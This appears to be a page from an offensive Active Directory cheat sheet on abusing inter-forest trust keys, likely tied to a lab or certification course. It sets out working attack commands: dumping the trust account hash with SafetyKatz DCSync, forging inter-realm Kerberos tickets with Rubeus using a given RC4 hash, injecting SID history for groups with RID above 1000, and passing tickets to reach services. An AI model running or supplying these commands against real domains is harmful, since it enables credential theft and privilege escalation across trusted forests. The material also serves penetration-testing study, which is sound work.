trust-key

Methodology

Dump the trust key of the child domain.
Check if SID Filtering is enabled.
Forge an inter-forest ticket.
Inject the ticket.
Enumerate group RID > 1000 on the target domain.
Forge an inter-forest ticket with special SIDS.
Inject the ticket

Powershell

[!INFO] Remember to follow the Powershell methodology

AD Module

Check if SID Filtering is enabled:

Get-ADTrust -Filter *

Look for groups with RID higher than 1000 in the target machine:

Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Dump trust key for the inter-forest trust:

SafetyKatz.exe '"lsadump::dcsync /user:eu\euvendor$"'

Rubeus

Forge an inter-realm TGT:

Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/eu.local /rc4:b96659c7b2109d2e63e6de676d48646c /sid:S-1-5-21-3657428294-2017276338-1274645009 /nowrap

Inject the ticket:

Rubeus.exe asktgs /ticket:doIFEzCCBQ /service:CIFS/euvendor-dc.euvendor.local /dc:euvendordc.euvendor.local /ptt

[!INFO] We can only access specific resources that are explicitly shared!

Forge a TGS using inter-realm TGT:

Rubeus.exe asktgs /service:http/euvendornet.euvendor.local /dc:euvendor-dc.euvendor.local /ptt /ticket:doIFOzCCBT...

Inject SID history of group with RID > 1000:

Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/eu.local /rc4:b96659c7b2109d2e63e6de676d48646c /sids:S-1-5-21-4066061358-3942393892-617142613-1103 /nowrap

Request TGS with the TGT:

Rubeus.exe asktgs /service:http/euvendornet.euvendor.local /dc:euvendor-dc.euvendor.local /ptt /ticket:doIFOzCCBT...

Previouspam-trust Nexttrust-transitivity

Last updated 2 months ago

hashtagMethodology

hashtagPowershell

hashtagAD Module

hashtagBinaries

hashtagSafetyKatz

hashtagRubeus